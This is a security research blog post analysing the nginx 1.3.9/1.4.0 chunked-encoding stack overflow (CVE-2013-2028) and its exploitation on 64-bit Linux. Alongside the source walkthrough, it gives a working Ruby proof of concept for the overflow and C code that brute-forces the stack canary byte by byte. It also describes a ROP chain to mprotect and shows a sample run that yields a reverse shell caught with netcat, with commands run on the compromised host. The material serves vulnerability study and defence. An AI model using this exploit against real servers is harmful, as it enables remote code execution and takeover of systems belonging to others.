[h=1]Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028)[/h]

May 21, 2013 by w00d

A few days after the release of the nginx advisory (CVE-2013-2028), we managed to successfully exploit the vulnerability with full control over the program flow. However, in order to make it more reliable and useful in real-world environments, we also explored several program paths and found some other attack vectors. Since the exploit for 32-bit nginx is now available in Metasploit, we decided to publish some of our work here. In this post, you will find a quick analysis of the vulnerability and an exploit for a 64-bit Linux server using the stack-based overflow attack vector.

[h=3]The Bug[/h] Based on the patch on nginx.org, there is a code path that leads to a stack-based overflow vulnerability, involving three different nginx components:

1) The calculation of the "chunked size" when someone sends an HTTP request with the header "Transfer-Encoding: chunked". It is calculated at src/http/ngx_http_parse.c:2011:

if (ch >= '0' && ch <= '9') {
    ctx->size = ctx->size * 16 + (ch - '0');
    break;
}

c = (u_char) (ch | 0x20);

if (c >= 'a' && c <= 'f') {
    ctx->size = ctx->size * 16 + (c - 'a' + 10);
    break;
}

It simply parses the chunked-size input as hexadecimal digits and accumulates the value into ctx->size. Since ctx->size is declared as size_t, an unsigned type, the value of the variable can be misinterpreted as a negative number when cast to a signed type, as we will see later.
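
To illustrate, here is a minimal standalone sketch (not the actual nginx parser) of the same accumulation: feeding it a chunk-size field made of many 'f' digits followed by "0f0f0f0f", like the one our proof of concept below sends, simply wraps the size_t accumulator modulo 2^64 and leaves a huge unsigned value.

#include <stdio.h>
#include <string.h>

/* Standalone sketch of the ctx->size accumulation in ngx_http_parse_chunked;
 * this mirrors the hex-digit loop quoted above, it is not the real nginx code. */
static size_t parse_chunk_size(const char *s)
{
    size_t size = 0;

    for (; *s; s++) {
        unsigned char c = *s | 0x20;            /* lowercase, as nginx does */
        if (*s >= '0' && *s <= '9')
            size = size * 16 + (*s - '0');
        else if (c >= 'a' && c <= 'f')
            size = size * 16 + (c - 'a' + 10);
    }
    return size;
}

int main(void)
{
    /* 100 'f' digits followed by "0f0f0f0f"; any run of 16 or more 'f's
     * gives the same low 64 bits. */
    char field[109];
    memset(field, 'f', 100);
    strcpy(field + 100, "0f0f0f0f");

    printf("ctx->size = %#zx\n", parse_chunk_size(field));
    /* prints: ctx->size = 0xffffffff0f0f0f0f */
    return 0;
}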

2) The nginx module serving static files:

When nginx is set up to serve static files (which is the default setting), ngx_http_static_handler in src/http/modules/ngx_http_static_module.c:49 will be executed when a request is received.

ngx_http_static_handler will then call ngx_http_discard_request_body at src/http/modules/ngx_http_static_module.c:211.

ngx_http_discard_request_body will then call ngx_http_read_discarded_request_body at src/http/ngx_http_request_body.c:526.

In summary, the code path is: ngx_http_static_handler -> ngx_http_discard_request_body -> ngx_http_read_discarded_request_body

ngx_http_read_discarded_request_body is where it gets interesting: a fixed-size buffer is defined at src/http/ngx_http_request_body.c:630 as follows:

static ngx_int_t
ngx_http_read_discarded_request_body(ngx_http_request_t *r)
{
    size_t     size;
    ssize_t    n;
    ngx_int_t  rc;
    ngx_buf_t  b;
    u_char     buffer[NGX_HTTP_DISCARD_BUFFER_SIZE];

NGX_HTTP_DISCARD_BUFFER_SIZE is defined as 4096 in src/http/ngx_http_request.h:19.

The interesting part is how this buffer is filled at src/http/ngx_http_request_body.c:649, which we will use later in (3):

size = (size_t) ngx_min(r->headers_in.content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);
n = r->connection->recv(r->connection, buffer, size);

3) The state transition when parsing the HTTP request

Coming back to src/http/ngx_http_request_body.c: before calling ngx_http_read_discarded_request_body, nginx checks whether we have a "chunked" type of request; if so, it runs ngx_http_discard_request_body_filter, defined in src/http/ngx_http_request_body.c:680.

ngx_http_discard_request_body_filter executes ngx_http_parse_chunked, which is the code we mentioned in (1). After that, the return value "rc" is checked against some constants to decide the next move. One of them is particularly interesting:

if (rc == NGX_AGAIN) {

    /* set amount of data we want to see next time */

    r->headers_in.content_length_n = rb->chunked->length;
    break;
}

Suppose we can set rb->chunked->length to a very large number at (1) and then force rc = NGX_AGAIN at (3); the following events will happen:

- r->headers_in.content_length_n is set to a negative value (as it is declared as off_t, which is a signed integer type).

- ngx_http_discard_request_body_filter returns and the program moves on to execute ngx_http_read_discarded_request_body, which contains our vulnerable buffer.

- Finally, the recv() call is tricked into receiving more than 4096 bytes and overflows the buffer on the stack (see the sketch below).
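
A minimal standalone sketch of that last step (not nginx code; the local ngx_min macro is a simplified stand-in, and the negative value is the one our PoC below ends up producing): the negative content_length_n "wins" the comparison against the 4096-byte limit, and the cast to the unsigned size_t turns it into an enormous byte count for recv().

#include <stdio.h>
#include <stdint.h>

/* Simplified stand-in for nginx's ngx_min(): picks the smaller operand. */
#define ngx_min(a, b)  ((a) > (b) ? (b) : (a))

#define NGX_HTTP_DISCARD_BUFFER_SIZE  4096

int main(void)
{
    /* content_length_n is an off_t (signed); assume the chunked length
     * set in (1) ended up as this negative value. */
    int64_t content_length_n = -4042322155LL;

    size_t size = (size_t) ngx_min(content_length_n, NGX_HTTP_DISCARD_BUFFER_SIZE);

    printf("size passed to recv() = %zu\n", size);
    /* prints: size passed to recv() = 18446744069667229461 */
    return 0;
}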

There are many ways to set chunked->length, since rb->chunked->length is assigned at the end of the ngx_http_parse_chunked function based on rb->chunked->size, which we control directly:

switch (state) {

case sw_chunk_start:
    ctx->length = 3 /* "0" LF LF */;
    break;
case sw_chunk_size:
    ctx->length = 2 /* LF LF */
                  + (ctx->size ? ctx->size + 4 /* LF "0" LF LF */ : 0);
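
Working through the numbers for the chunk-size field our PoC below sends (a long run of 'f' digits followed by "0f0f0f0f", cut off exactly at the 1024-byte boundary so the parser stops in the sw_chunk_size state): the size_t accumulation wraps modulo 2^64 and leaves ctx->size = 0xFFFFFFFF0F0F0F0F, so ctx->length = ctx->size + 6 = 0xFFFFFFFF0F0F0F15. Assigned to the signed off_t content_length_n, this reads as -4042322155, and cast back to size_t at the recv size calculation it becomes 18446744069667229461, which is exactly the size visible in the second recvfrom() of the strace output below.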

To make rc = NGX_AGAIN, we note that nginx performs the first recv() for a request with a 1024-byte buffer, so if we send more than 1024 bytes, ngx_http_parse_chunked will return NGX_AGAIN, and when nginx tries to recv() again it will walk right into our setup.

The payload to overflow the stack buffer is as follows:

- Send an HTTP request with a "Transfer-Encoding: chunked" header

- Send a large hexadecimal number filling the entire 1024 bytes of the first read

- Send more than 4096 bytes to overflow the buffer when nginx tries to recv() the second time

TL;DR? Here is the proof of concept for x64:

require 'ronin'

tcp_connect(ARGV[0], ARGV[1].to_i) { |s|
  payload = ["GET / HTTP/1.1\r\n",
             "Host: 1337.vnsecurity.net\r\n",
             "Accept: */*\r\n",
             "Transfer-Encoding: chunked\r\n\r\n"].join
  payload << "f" * (1024 - payload.length - 8) + "0f0f0f0f" # chunked
  payload << "A" * (4096 + 8)                               # padding
  payload << "C" * 8                                        # cookie
  s.send(payload, 0)
}

strace output at the other end:

 strace -p 11337 -s 5000 2>&1 | grep recv
recvfrom(3, "GET / HTTP/1.1\r\nHost: 1337.vnsecurity.net\r\nAccept: */*\r\nTransfer-Encoding: chunked\r\n\r\nfff...snip..fff0f0f0f0f", 1024, 0, NULL, NULL) = 1024
recvfrom(3, "AAA..snip..AACCCCCCCC", 18446744069667229461, 0, NULL, NULL) = 4112

[h=3]Exploitation on x64:[/h] The problem of the stack cookie/canary can be overcome easily by brute-forcing it byte by byte. If we send one extra byte and the worker process crashes, it returns nothing, so we know our cookie value is wrong; we try another value until we receive some output.
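
To make the idea concrete, here is a rough standalone sketch of the byte-by-byte brute force. It is an illustration only, under several assumptions: the hard-coded HOST/PORT are placeholders, the payload layout is taken from the PoC above, the low cookie byte is assumed to be 0x00 as in the output below, and "the worker answered something" is used as the success oracle.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define HOST "127.0.0.1"              /* placeholder target              */
#define PORT 8080                     /* placeholder port                */
#define PREFIX_LEN (1024 + 4096 + 8)  /* request + padding up to cookie  */

/* Send the probe and report whether the worker answered anything:
 * a wrong cookie byte crashes the worker, so nothing comes back. */
static int worker_answers(const unsigned char *buf, size_t len)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    struct sockaddr_in sa = { .sin_family = AF_INET, .sin_port = htons(PORT) };
    struct timeval tv = { .tv_sec = 2, .tv_usec = 0 };
    char reply[16];
    ssize_t n = -1;

    inet_pton(AF_INET, HOST, &sa.sin_addr);
    setsockopt(fd, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv));

    if (connect(fd, (struct sockaddr *)&sa, sizeof(sa)) == 0) {
        send(fd, buf, len, 0);
        n = recv(fd, reply, sizeof(reply), 0);
    }
    close(fd);
    return n > 0;
}

int main(void)
{
    /* Same layout as the Ruby PoC above: a 1024-byte chunked request,
     * then 4096 + 8 bytes of padding, then the stack cookie. */
    static const char req[] =
        "GET / HTTP/1.1\r\n"
        "Host: 1337.vnsecurity.net\r\n"
        "Accept: */*\r\n"
        "Transfer-Encoding: chunked\r\n\r\n";

    unsigned char probe[PREFIX_LEN + 8];
    size_t rlen = strlen(req);

    memcpy(probe, req, rlen);
    memset(probe + rlen, 'f', 1024 - rlen - 8);
    memcpy(probe + 1024 - 8, "0f0f0f0f", 8);
    memset(probe + 1024, 'A', 4096 + 8);

    unsigned char cookie[8] = { 0 };     /* low byte assumed to be 0x00 */

    for (int pos = 1; pos < 8; pos++) {
        for (int guess = 0; guess < 256; guess++) {
            memcpy(probe + PREFIX_LEN, cookie, pos);        /* known bytes */
            probe[PREFIX_LEN + pos] = (unsigned char)guess; /* candidate   */

            if (worker_answers(probe, PREFIX_LEN + pos + 1)) {
                cookie[pos] = (unsigned char)guess;
                printf("[+] byte %d = %d\n", pos, guess);
                break;
            }
        }
    }
    return 0;
}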

Then we need to bypass ASLR and DEP. The 32-bit exploitation approach used in the Metasploit module won't work here, since it brute-forces the libc address, which is not feasible given the large address space on x64.

We wrote an exploit that relies only on the binary, i.e. we build the ROP chain from the binary itself. The mprotect address is computed from the mmap64 address (in the GOT table) and then used to make a memory chunk writable and executable. Then we use some ROP gadgets to copy our shellcode there and finally have it executed by returning to it.
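
The mprotect-from-mmap64 trick relies on the fixed distance between the two functions inside a given libc build. A minimal sketch of how one might obtain that delta, assuming access to the same libc build as the target (the constant would then be added by the ROP chain to the mmap64 address read from nginx's GOT):

#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <sys/mman.h>

/* Prints the offset between mprotect and mmap64 in the local libc.
 * The ROP chain can add this constant to the mmap64 address found in
 * the GOT to obtain mprotect -- assuming the target runs the same libc. */
int main(void)
{
    intptr_t delta = (intptr_t)mprotect - (intptr_t)mmap64;
    printf("mprotect = mmap64 + %ld\n", (long)delta);
    return 0;
}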

TL;DR: the full exploit code can be found here. A sample run:

ruby exp-nginx.rb 1.2.3.4 4321
[+] searching for byte: 1
214
[+] searching for byte: 2
102
[+] searching for byte: 3
232
[+] searching for byte: 4
213
[+] searching for byte: 5
103
[+] searching for byte: 6
151
[+] searching for byte: 7
45
Found cookie: \x00\xd6\x66\xe8\xd5\x67\x97\x2d 8
PRESS ENTER TO GIVE THE SHIT TO THE HOLE AT w.w.w.w 4000
1120 connections

At w.w.w.w

nc -lvvv 4000
Connection from 1.2.3.4 port 4000 [tcp/*] accepted
uname -a
Linux ip-10-80-253-191 3.2.0-40-virtual #64-Ubuntu SMP Mon Mar 25 21:42:18 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
id
uid=1000(ubuntu) gid=1000(ubuntu) groups=1000(ubuntu),4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),110(netdev),111(admin)
ps aux | grep nginx
ubuntu 2920 0.1 0.0 13920 668 ? Ss 15:11 0:01 nginx: master process ./sbin/nginx
ubuntu 5037 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process
ubuntu 5039 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process
ubuntu 5041 0.0 0.0 14316 1024 ? S 15:20 0:00 nginx: worker process

[h=3]Reliable exploitation[/h] There are some reasons why the above exploitation technique may not work in practice:

1) Nginx uses non-blocking recv(). If we can't send enough data to overwrite the cookie/return address, the exploit will fail. This is often the case, since a production server will be loaded with requests from other users.

2) Our analysis here is for the default nginx configuration; the code path can be very different with other settings, making the exploit somewhat useless there.

3) A blind attack is difficult without knowledge of the binary / OS on the remote server. For a 32-bit OS, one may further brute-force the address of "write" in the code space in order to leak information, but it will still fail against PIE.

Trying to make this more practical in real-world environments, we actually found another attack vector which is more reliable and works with several nginx configurations. However, we will keep that for another post.

Source: Analysis of nginx 1.3.9/1.4.0 stack buffer overflow and x64 exploitation (CVE-2013-2028) : VNSECURITY / CLGT TEAM
